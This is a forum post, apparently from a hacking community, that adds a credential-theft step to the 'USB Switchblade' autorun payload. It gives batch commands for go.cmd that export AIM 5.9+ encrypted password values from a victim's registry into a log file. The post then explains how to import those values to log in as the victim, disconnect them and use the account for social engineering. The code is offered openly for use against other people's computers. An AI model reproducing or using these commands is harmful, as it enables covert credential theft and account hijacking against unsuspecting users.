Jump to content

USB Switchblade AIM 5.9+ encrypted password extract


Recommended Posts

Now before I continue...

I know I am going to get flamed for this payload addition, but I think it is kind of an important addition due to some inabilities in the program MessenPass.

MessenPass is the MSN, AIM, etc password decrypter / stealer that is currently used in the USB Switchblade. However, the Mspass program only works for versions of AIM 5.5 (as far as I am aware of) and not versions of AIM 5.9

AIM 5.9 and higher versions use a more potent password algorithm, and have yet to be decrypted. By adding the following code to your go.cmd file, you can extract the encrypted passwords from the 'victim' computer.

@echo [AIM 5.9 Encrypted Password Extract] >> Documentslogfiles%computername%.log 2>&1

echo. >> Documentslogfiles%computername%.log 2>&1

regedit.exe /E Documentslogfilesaimdump.reg "HKEY_CURRENT_USERSOFTWAREAmerica OnlineAOL Instant Messenger (tM)CurrentVersionusers"

TYPE Documentslogfilesaimdump.reg | find "Password1" >> Documentslogfiles%computername%.log

echo. >> Documentslogfiles%computername%.log 2>&1

@echo [End AIM 5.9 Encrypted Password Extract] >> Documentslogfiles%computername%.log 2>&1

After extracting the encrypted password registry values you can import the information remotely into your own registry and sign-on as the victim's AIM screen name; just as if they had entered their password at your computer and clicked on the "Save Password" check box.

Unfortunately you cannot change the password. However, you can login as the 'victim', and you can disconnect them; when the AOL System IMs you and asks you to "Press 1 to disconnect your other connection". So it is basically a pretty lame DoS attack. You could also use this for social engineering.

If anyone wants to criticize my lame code, please go ahead and post a cleaner way of doing this. :?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...